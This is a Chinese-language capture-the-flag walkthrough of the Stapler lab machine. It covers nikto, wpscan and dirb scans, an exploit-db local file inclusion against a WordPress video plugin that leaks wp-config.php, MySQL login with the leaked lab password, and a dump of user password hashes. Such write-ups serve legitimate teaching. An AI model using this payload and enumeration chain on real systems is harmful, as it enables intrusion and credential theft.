1.5 3306 port MySQL

看看能不能直接登入:

$ mysql -u root -p -h 192.168.44.227
Enter password:
ERROR 1045 (28000): Access denied for user 'root'@'192.168.44.1' (using password: NO)

看來也沒蠢到用空密碼。

1.6 12380 port

這個port有開apache,直接網頁連連看,網址列是192.168.44.227:12380

檢視這網頁的原始碼,可以發現裡面有一行註釋:

<!-- A message from the head of our HR department, Zoe, if you are looking at this, we want to hire you! -->

所以可能有一個用戶Zoe。

而既然這裡有一個web網頁,當然用nikto或dirb掃掃看:

$ nikto -h 192.168.44.227:12380
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.44.227
+ Target Hostname:    192.168.44.227
+ Target Port:        12380
---------------------------------------------------------------------------
+ SSL Info:        Subject:  /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=pam@red.localhost
                   Ciphers:  ECDHE-RSA-AES256-GCM-SHA384
                   Issuer:   /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=pam@red.localhost
+ Start Time:         2022-11-01 12:20:40 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'dave' found, with contents: Soemthing doesn't look right here
+ The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
+ The site uses SSL and Expect-CT header is not present.
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry '/admin112233/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/blogblog/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 2 entries which should be manually viewed.
+ Hostname '192.168.44.227' does not match certificate's names: Red.Initech
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: OPTIONS, GET, HEAD, POST
+ Uncommon header 'x-ob_mode' found, with contents: 1
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ 8071 requests: 0 error(s) and 15 item(s) reported on remote host
+ End Time:           2022-11-01 12:24:07 (GMT8) (207 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

從nikto的掃瞄結果,可以發現有admin112233、blogblog還有phpmyadmin等隱藏路徑。

雖然直接用http://192.168.44.227:12380/admin112233網頁不會變,但只要把http換成https就會顯示出如下網頁:

同樣的,用https://192.168.44.227:12380/blogblog/,來拜訪:

在這個網頁的最下方,有:

檢視原始碼第163行,https://192.168.44.227:12380/blogblog/wp-login.php,可到以下網頁

<li><a href="https://192.168.44.227:12380/blogblog/wp-login.php?action=register">Register</a></li>            <li><a href="https://192.168.44.227:12380/blogblog/wp-login.php">Log in</a></li>

總之就是一個wordpress網頁。可以使用wpscan來掃描:

sudo wpscan --url https://192.168.44.227:12380/blogblog/ --enumerate u1-100,ap --plugins-detection aggressive --disable-tls-checks

這裡使用--enumerate u,ap,分別代表枚舉前100名帳戶名(u1-100),枚舉所有外掛程式(ap),并添加 --plugins-detection aggressive 参数指定主动扫描模式,否則也完全掃不到外掛。添加 --disable-tls-checks 参数忽略 TLS 检查,不然根本掃不出結果。

$ sudo wpscan --url https://192.168.44.227:12380/blogblog/ --enumerate u1-100,ap --plugins-detection aggressive --disable-tls-checks
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: https://192.168.44.227:12380/blogblog/ [192.168.44.227]
[+] Started: Tue Nov  1 16:22:07 2022

Interesting Finding(s):

[+] Headers
 | Interesting Entries:
 |  - Server: Apache/2.4.18 (Ubuntu)
 |  - Dave: Soemthing doesn't look right here
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: https://192.168.44.227:12380/blogblog/xmlrpc.php
 | Found By: Headers (Passive Detection)
 | Confidence: 100%
 | Confirmed By:
 |  - Link Tag (Passive Detection), 30% confidence
 |  - Direct Access (Aggressive Detection), 100% confidence
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: https://192.168.44.227:12380/blogblog/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Registration is enabled: https://192.168.44.227:12380/blogblog/wp-login.php?action=register
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: https://192.168.44.227:12380/blogblog/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: https://192.168.44.227:12380/blogblog/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.2.1 identified (Insecure, released on 2015-04-27).
 | Found By: Rss Generator (Passive Detection)
 |  - https://192.168.44.227:12380/blogblog/?feed=rss2, <generator>http://wordpress.org/?v=4.2.1</generator>
 |  - https://192.168.44.227:12380/blogblog/?feed=comments-rss2, <generator>http://wordpress.org/?v=4.2.1</generator>

[+] WordPress theme in use: bhost
 | Location: https://192.168.44.227:12380/blogblog/wp-content/themes/bhost/
 | Last Updated: 2022-10-30T00:00:00.000Z
 | Readme: https://192.168.44.227:12380/blogblog/wp-content/themes/bhost/readme.txt
 | [!] The version is out of date, the latest version is 1.6
 | Style URL: https://192.168.44.227:12380/blogblog/wp-content/themes/bhost/style.css?ver=4.2.1
 | Style Name: BHost
 | Description: Bhost is a nice , clean , beautifull, Responsive and modern design free WordPress Theme. This theme ...
 | Author: Masum Billah
 | Author URI: http://getmasum.net/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.2.9 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - https://192.168.44.227:12380/blogblog/wp-content/themes/bhost/style.css?ver=4.2.1, Match: 'Version: 1.2.9'

[+] Enumerating All Plugins (via Aggressive Methods)
 Checking Known Locations - Time: 00:03:44 <==================================> (100942 / 100942) 100.00% Time: 00:03:44
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] advanced-video-embed-embed-videos-or-playlists
 | Location: https://192.168.44.227:12380/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/
 | Latest Version: 1.0 (up to date)
 | Last Updated: 2015-10-14T13:52:00.000Z
 | Readme: https://192.168.44.227:12380/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/readme.txt
 | [!] Directory listing is enabled
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - https://192.168.44.227:12380/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/, status: 200
 |
 | Version: 1.0 (80% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - https://192.168.44.227:12380/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/readme.txt

[+] akismet
 | Location: https://192.168.44.227:12380/blogblog/wp-content/plugins/akismet/
 | Latest Version: 5.0.1
 | Last Updated: 2022-09-28T15:27:00.000Z
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - https://192.168.44.227:12380/blogblog/wp-content/plugins/akismet/, status: 403
 |
 | The version could not be determined.

[+] shortcode-ui
 | Location: https://192.168.44.227:12380/blogblog/wp-content/plugins/shortcode-ui/
 | Last Updated: 2019-01-16T22:56:00.000Z
 | Readme: https://192.168.44.227:12380/blogblog/wp-content/plugins/shortcode-ui/readme.txt
 | [!] The version is out of date, the latest version is 0.7.4
 | [!] Directory listing is enabled
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - https://192.168.44.227:12380/blogblog/wp-content/plugins/shortcode-ui/, status: 200
 |
 | Version: 0.6.2 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - https://192.168.44.227:12380/blogblog/wp-content/plugins/shortcode-ui/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - https://192.168.44.227:12380/blogblog/wp-content/plugins/shortcode-ui/readme.txt

[+] two-factor
 | Location: https://192.168.44.227:12380/blogblog/wp-content/plugins/two-factor/
 | Latest Version: 0.7.3
 | Last Updated: 2022-10-17T15:56:00.000Z
 | Readme: https://192.168.44.227:12380/blogblog/wp-content/plugins/two-factor/readme.txt
 | [!] Directory listing is enabled
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - https://192.168.44.227:12380/blogblog/wp-content/plugins/two-factor/, status: 200
 |
 | The version could not be determined.

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:03 <========================================> (100 / 100) 100.00% Time: 00:00:03

[i] User(s) Identified:

[+] John Smith
 | Found By: Author Posts - Display Name (Passive Detection)
 | Confirmed By: Rss Generator (Passive Detection)

[+] heather
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] peter
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] barry
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] john
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] garry
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] harry
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] kathy
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] tim
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] scott
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] zoe
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] simon
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] elly
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] dave
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] abby
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] vicki
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] pam
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Tue Nov  1 16:26:09 2022
[+] Requests Done: 101087
[+] Cached Requests: 63
[+] Data Sent: 30.122 MB
[+] Data Received: 13.679 MB
[+] Memory used: 519.211 MB
[+] Elapsed time: 00:04:02

首先來看看外掛:

[i] Plugin(s) Identified:

[+] advanced-video-embed-embed-videos-or-playlists
 | Location: https://192.168.44.227:12380/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/
 | Latest Version: 1.0 (up to date)
 | Last Updated: 2015-10-14T13:52:00.000Z
 | Readme: https://192.168.44.227:12380/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/readme.txt
 | [!] Directory listing is enabled
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - https://192.168.44.227:12380/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/, status: 200
 |
 | Version: 1.0 (80% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - https://192.168.44.227:12380/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/readme.txt

[+] akismet
 | Location: https://192.168.44.227:12380/blogblog/wp-content/plugins/akismet/
 | Latest Version: 5.0.1
 | Last Updated: 2022-09-28T15:27:00.000Z
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - https://192.168.44.227:12380/blogblog/wp-content/plugins/akismet/, status: 403
 |
 | The version could not be determined.

[+] shortcode-ui
 | Location: https://192.168.44.227:12380/blogblog/wp-content/plugins/shortcode-ui/
 | Last Updated: 2019-01-16T22:56:00.000Z
 | Readme: https://192.168.44.227:12380/blogblog/wp-content/plugins/shortcode-ui/readme.txt
 | [!] The version is out of date, the latest version is 0.7.4
 | [!] Directory listing is enabled
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - https://192.168.44.227:12380/blogblog/wp-content/plugins/shortcode-ui/, status: 200
 |
 | Version: 0.6.2 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - https://192.168.44.227:12380/blogblog/wp-content/plugins/shortcode-ui/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - https://192.168.44.227:12380/blogblog/wp-content/plugins/shortcode-ui/readme.txt

[+] two-factor
 | Location: https://192.168.44.227:12380/blogblog/wp-content/plugins/two-factor/
 | Latest Version: 0.7.3
 | Last Updated: 2022-10-17T15:56:00.000Z
 | Readme: https://192.168.44.227:12380/blogblog/wp-content/plugins/two-factor/readme.txt
 | [!] Directory listing is enabled
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - https://192.168.44.227:12380/blogblog/wp-content/plugins/two-factor/, status: 200
 |
 | The version could not be determined.

都有列出外掛所在位址,可以到https://192.168.44.227:12380/blogblog//wp-content/plugins/看看。

外掛可能也是會有漏洞的,先點進第一個資料夾內:

查看readme.txt:

=== Advanced video embed  ===
Contributors: arshmultani,meenakshi.php.developer,DScom
Donate link: https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclick&hosted_button_id=Z7C7DNDD9VS3L
Tags: advanced video embed,youtube video embed,auto poster, wordpress youtube playlist maker,wordpress youtube playlists,wordpress youtube plugin,wordpress youtube embed,wordpress videos youtube,wordpress youtube video shortcode,wordpress youtube video as post,video embed , wordpress video embeding plugin,
Requires at least: 3.0.1
Tested up to: 3.3.1
Stable tag: 1.0
Version: 1.0
License: GPLv2 or later
License URI: http://www.gnu.org/licenses/gpl-2.0.html

Adavnced Video embed free version supports youtube video embed into your wordpress posts, with easy to use search panel along side you can also create youtube playlists within the search panel and generate its shortcode to use in posts

== Description ==
Adavnced Video embed free version supports youtube video embed into your wordpress posts, with easy to use search panel along side you can also create youtube playlists within the search panel and generate its shortcode to use in posts.

You can use biult in shortcode to view any youtube video in any post or page or sidebar anywhere you want just use the shortcode below with paramteres as well

Youtube video shortcode e.g: [ave_yt i="9bZkp7q19f0" rel="Yes" full="Yes" controls="Yes"]


Parameters :

*   <b>i</b> is an youtube video id which is required.
*   <b>rel</b> rel can be <b>Yes</b> or <b>No</b> or remove it to show relative videos normally | this parameters can be used to show or hide suggestion when video is over.
*   <b>full</b> full can be <b>Yes</b> or <b>No</b> or remove it to allow full screen normally | this parameters can be used to allow or disallow the full screen mode of video.
*   <b>controls</b> controls can be <b>Yes</b> or <b>No</b> or remove it to use controls normally

Youtube make videos id playlist : [ave_playlist ids="e-ORhEE9VVg,9bZkp7q19f0,0KSOMA3QBU0"]

Parameters :

*   <b>ids</b> this parameter can include one or more id's divided by comma(,) and used in any post or page or anywhere.

You can also use the search panel By going into A.V.E SEARCH VIDEO section and search video by clicking on <b>View</b> an popup will open where you can generate an shortcode with parameters you want and also you can generate an playlist ,by clicking on <b>+ Playlist</b> button pn any video you can add it into an box , you can add as much video you want and then click on generate button along the input box and an shortcode will be generated for you to use in an post or page or anywhere in wordpress site.

Our agency website: <a href="http://www.dscom.it/">DScom.it/<a> our team <a href="http://dscom.it/team-communication-for-business-strategy-brescia/">DScom Team</a> 
== Installation ==

1. Upload advanced_video_embed folder inside 'wp-content/plugins/'
2. Go to 'Plugins > Installed plugins' and activate the plugin.
3. Go to A.V.E Search video menu hover on it and then click on A.v.e settings and fill your api key.

== Screenshots ==

1. Search page screenshot
2. Playlist bar screenshot
3. Poup screenshot

可以發現它的版本號是1.0。先找找看有沒有它的攻擊腳本:

$ searchsploit advanced video
-------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                        |  Path
-------------------------------------------------------------------------------------- ---------------------------------
WordPress Plugin Advanced Video 1.0 - Local File Inclusion                            | php/webapps/39646.py
-------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

這個也是針對1.0,看來是bingo了。

要把它copy到我為打這靶機設立的資料夾,有searchsploit -m指令:

$ cd target_machine/stapler/

$ ls
todo-list.txt  vsftpd.conf  wordpress-4.tar.gz

$ searchsploit -m 39646
  Exploit: WordPress Plugin Advanced Video 1.0 - Local File Inclusion
      URL: https://www.exploit-db.com/exploits/39646
     Path: /usr/share/exploitdb/exploits/php/webapps/39646.py
File Type: Python script, ASCII text executable

Copied to: /home/nathan/target_machine/stapler/39646.py

$ ls
39646.py  todo-list.txt  vsftpd.conf  wordpress-4.tar.gz

好,來解析一下這個python吧。

import random
import urllib2
import re

url = "http://127.0.0.1/wordpress" # insert url to wordpress

randomID = long(random.random() * 100000000000000000L)

objHtml = urllib2.urlopen(url + '/wp-admin/admin-ajax.php?action=ave_publishPost&title=' + str(randomID) + '&short=rnd&term=rnd&thumb=../wp-config.php')

關鍵看這幾行就好。首先,url的http://127.0.0.1/wordpress要改成https://192.168.44.227:12380/blogblog,因為這才是在我這台機器上連到wordpress的網址。randomID是個17位亂碼,所以objHtml可以寫成一個實例:

https://192.168.44.227:12380/blogblog/wp-admin/admin-ajax.php?action=ave_publishPost&title=26013192698497744&short=rnd&term=rnd&thumb=../wp-config.php

輸入這個網址後,會出現一個網址

不過連到這網址https://192.168.44.227:12380/blogblog/?p=210後,只會跟你說找不到:

不過既然是LFI,那剛剛應該有做什麼動作,比如上載了什麼東西。所以先爆破目錄,猜可能藏在哪:

$ dirb https://192.168.44.227:12380/blogblog/

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Sat Nov  5 09:59:53 2022
URL_BASE: https://192.168.44.227:12380/blogblog/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: https://192.168.44.227:12380/blogblog/ ----
+ https://192.168.44.227:12380/blogblog/index.php (CODE:301|SIZE:0)
==> DIRECTORY: https://192.168.44.227:12380/blogblog/wp-admin/
==> DIRECTORY: https://192.168.44.227:12380/blogblog/wp-content/
==> DIRECTORY: https://192.168.44.227:12380/blogblog/wp-includes/
+ https://192.168.44.227:12380/blogblog/xmlrpc.php (CODE:405|SIZE:42)

---- Entering directory: https://192.168.44.227:12380/blogblog/wp-admin/ ----
+ https://192.168.44.227:12380/blogblog/wp-admin/admin.php (CODE:302|SIZE:0)
==> DIRECTORY: https://192.168.44.227:12380/blogblog/wp-admin/css/
==> DIRECTORY: https://192.168.44.227:12380/blogblog/wp-admin/images/
==> DIRECTORY: https://192.168.44.227:12380/blogblog/wp-admin/includes/
+ https://192.168.44.227:12380/blogblog/wp-admin/index.php (CODE:302|SIZE:0)
==> DIRECTORY: https://192.168.44.227:12380/blogblog/wp-admin/js/
==> DIRECTORY: https://192.168.44.227:12380/blogblog/wp-admin/maint/
==> DIRECTORY: https://192.168.44.227:12380/blogblog/wp-admin/network/
==> DIRECTORY: https://192.168.44.227:12380/blogblog/wp-admin/user/

---- Entering directory: https://192.168.44.227:12380/blogblog/wp-content/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: https://192.168.44.227:12380/blogblog/wp-includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: https://192.168.44.227:12380/blogblog/wp-admin/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: https://192.168.44.227:12380/blogblog/wp-admin/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: https://192.168.44.227:12380/blogblog/wp-admin/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: https://192.168.44.227:12380/blogblog/wp-admin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: https://192.168.44.227:12380/blogblog/wp-admin/maint/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: https://192.168.44.227:12380/blogblog/wp-admin/network/ ----
+ https://192.168.44.227:12380/blogblog/wp-admin/network/admin.php (CODE:302|SIZE:0)
+ https://192.168.44.227:12380/blogblog/wp-admin/network/index.php (CODE:302|SIZE:0)

---- Entering directory: https://192.168.44.227:12380/blogblog/wp-admin/user/ ----
+ https://192.168.44.227:12380/blogblog/wp-admin/user/admin.php (CODE:302|SIZE:0)
+ https://192.168.44.227:12380/blogblog/wp-admin/user/index.php (CODE:302|SIZE:0)

-----------------
END_TIME: Sat Nov  5 10:00:08 2022
DOWNLOADED: 18448 - FOUND: 8

就來看看wp-content:

可以發現有一個uploads資料夾是今天日期,點進去:

有個圖片檔,但點進去以後看不到東西:

把它下載下來:

$ wget https://192.168.44.227:12380/blogblog/wp-content/uploads/512237901.jpeg
--2022-11-05 10:10:27--  https://192.168.44.227:12380/blogblog/wp-content/uploads/512237901.jpeg
Connecting to 192.168.44.227:12380... connected.
ERROR: The certificate of ‘192.168.44.227’ is not trusted.
ERROR: The certificate of ‘192.168.44.227’ doesn't have a known issuer.
The certificate's owner does not match hostname ‘192.168.44.227’

$ wget https://192.168.44.227:12380/blogblog/wp-content/uploads/512237901.jpeg --no-check-certificate
--2022-11-05 10:11:44--  https://192.168.44.227:12380/blogblog/wp-content/uploads/512237901.jpeg
Connecting to 192.168.44.227:12380... connected.
WARNING: The certificate of ‘192.168.44.227’ is not trusted.
WARNING: The certificate of ‘192.168.44.227’ doesn't have a known issuer.
The certificate's owner does not match hostname ‘192.168.44.227’
HTTP request sent, awaiting response... 200 OK
Length: 3042 (3.0K) [image/jpeg]
Saving to: ‘512237901.jpeg’

512237901.jpeg                100%[=================================================>]   2.97K  --.-KB/s    in 0s

2022-11-05 10:11:44 (261 MB/s) - ‘512237901.jpeg’ saved [3042/3042]

記得wget要加上--no-check-certificate這個參數。

看看圖片檔:

$ cat 512237901.jpeg
<?php
/**
 * The base configurations of the WordPress.
 *
 * This file has the following configurations: MySQL settings, Table Prefix,
 * Secret Keys, and ABSPATH. You can find more information by visiting
 * {@link https://codex.wordpress.org/Editing_wp-config.php Editing wp-config.php}
 * Codex page. You can get the MySQL settings from your web host.
 *
 * This file is used by the wp-config.php creation script during the
 * installation. You don't have to use the web site, you can just copy this file
 * to "wp-config.php" and fill in the values.
 *
 * @package WordPress
 */

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');

/** MySQL database username */
define('DB_USER', 'root');

/** MySQL database password */
define('DB_PASSWORD', 'plbkac');

/** MySQL hostname */
define('DB_HOST', 'localhost');

/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8mb4');

/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');

/**#@+
 * Authentication Unique Keys and Salts.
 *
 * Change these to different unique phrases!
 * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
 * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
define('AUTH_KEY',         'V 5p=[.Vds8~SX;>t)++Tt57U6{Xe`T|oW^eQ!mHr }]>9RX07W<sZ,I~`6Y5-T:');
define('SECURE_AUTH_KEY',  'vJZq=p.Ug,]:<-P#A|k-+:;JzV8*pZ|K/U*J][Nyvs+}&!/#>4#K7eFP5-av`n)2');
define('LOGGED_IN_KEY',    'ql-Vfg[?v6{ZR*+O)|Hf OpPWYfKX0Jmpl8zU<cr.wm?|jqZH:YMv;zu@tM7P:4o');
define('NONCE_KEY',        'j|V8J.~n}R2,mlU%?C8o2[~6Vo1{Gt+4mykbYH;HDAIj9TE?QQI!VW]]D`3i73xO');
define('AUTH_SALT',        'I{gDlDs`Z@.+/AdyzYw4%+<WsO-LDBHT}>}!||Xrf@1E6jJNV={p1?yMKYec*OI$');
define('SECURE_AUTH_SALT', '.HJmx^zb];5P}hM-uJ%^+9=0SBQEh[[*>#z+p>nVi10`XOUq (Zml~op3SG4OG_D');
define('LOGGED_IN_SALT',   '[Zz!)%R7/w37+:9L#.=hL:cyeMM2kTx&_nP4{D}n=y=FQt%zJw>c[a+;ppCzIkt;');
define('NONCE_SALT',       'tb(}BfgB7l!rhDVm{eK6^MSN-|o]S]]axl4TE_y+Fi5I-RxN/9xeTsK]#ga_9:hJ');

/**#@-*/

/**
 * WordPress Database Table prefix.
 *
 * You can have multiple installations in one database if you give each a unique
 * prefix. Only numbers, letters, and underscores please!
 */
$table_prefix  = 'wp_';

/**
 * For developers: WordPress debugging mode.
 *
 * Change this to true to enable the display of notices during development.
 * It is strongly recommended that plugin and theme developers use WP_DEBUG
 * in their development environments.
 */
define('WP_DEBUG', false);

/* That's all, stop editing! Happy blogging. */

/** Absolute path to the WordPress directory. */
if ( !defined('ABSPATH') )
        define('ABSPATH', dirname(__FILE__) . '/');

/** Sets up WordPress vars and included files. */
require_once(ABSPATH . 'wp-settings.php');

define('WP_HTTP_BLOCK_EXTERNAL', true);

看來裡面的內容,是之前攻擊腳本內提到的wp-config.php。這裡面提供了資料庫帳密:

/** MySQL database username */
define('DB_USER', 'root');

/** MySQL database password */
define('DB_PASSWORD', 'plbkac');

依此登入資料庫:

$ mysql -u root -p -h 192.168.44.227
Enter password:
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MySQL connection id is 23
Server version: 5.7.12-0ubuntu1 (Ubuntu)

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MySQL [(none)]>

好,接下來試試上一次(KIOPTRIX: LEVEL 1.3 (#4))學到的姿勢,看能不能資料庫提權:

MySQL [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| loot               |
| mysql              |
| performance_schema |
| phpmyadmin         |
| proof              |
| sys                |
| wordpress          |
+--------------------+
8 rows in set (51.390 sec)

MySQL [(none)]> use mysql;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MySQL [mysql]> select * from func;
Empty set (31.459 sec)

結果在select * from func;這條指令顯示出來的是空的,所以沒辦法跟上次一樣用sys_evalsys_exec來執行指令。

換wordpress資料庫來看看:

MySQL [(none)]> use mysql;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MySQL [mysql]> select * from func;
Empty set (31.459 sec)

MySQL [mysql]> use wordpress;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MySQL [wordpress]> select * from wp_users;

select * from wp_users;顯示的欄位太多了,所以只顯示用戶名跟密碼:

MySQL [wordpress]> select user_login,user_pass from wp_users;
+------------+------------------------------------+
| user_login | user_pass                          |
+------------+------------------------------------+
| John       | $P$B7889EMq/erHIuZapMB8GEizebcIy9. |
| Elly       | $P$BlumbJRRBit7y50Y17.UPJ/xEgv4my0 |
| Peter      | $P$BTzoYuAFiBA5ixX2njL0XcLzu67sGD0 |
| barry      | $P$BIp1ND3G70AnRAkRY41vpVypsTfZhk0 |
| heather    | $P$Bwd0VpK8hX4aN.rZ14WDdhEIGeJgf10 |
| garry      | $P$BzjfKAHd6N4cHKiugLX.4aLes8PxnZ1 |
| harry      | $P$BqV.SQ6OtKhVV7k7h1wqESkMh41buR0 |
| scott      | $P$BFmSPiDX1fChKRsytp1yp8Jo7RdHeI1 |
| kathy      | $P$BZlxAMnC6ON.PYaurLGrhfBi6TjtcA0 |
| tim        | $P$BXDR7dLIJczwfuExJdpQqRsNf.9ueN0 |
| ZOE        | $P$B.gMMKRP11QOdT5m1s9mstAUEDjagu1 |
| Dave       | $P$Bl7/V9Lqvu37jJT.6t4KWmY.v907Hy. |
| Simon      | $P$BLxdiNNRP008kOQ.jE44CjSK/7tEcz0 |
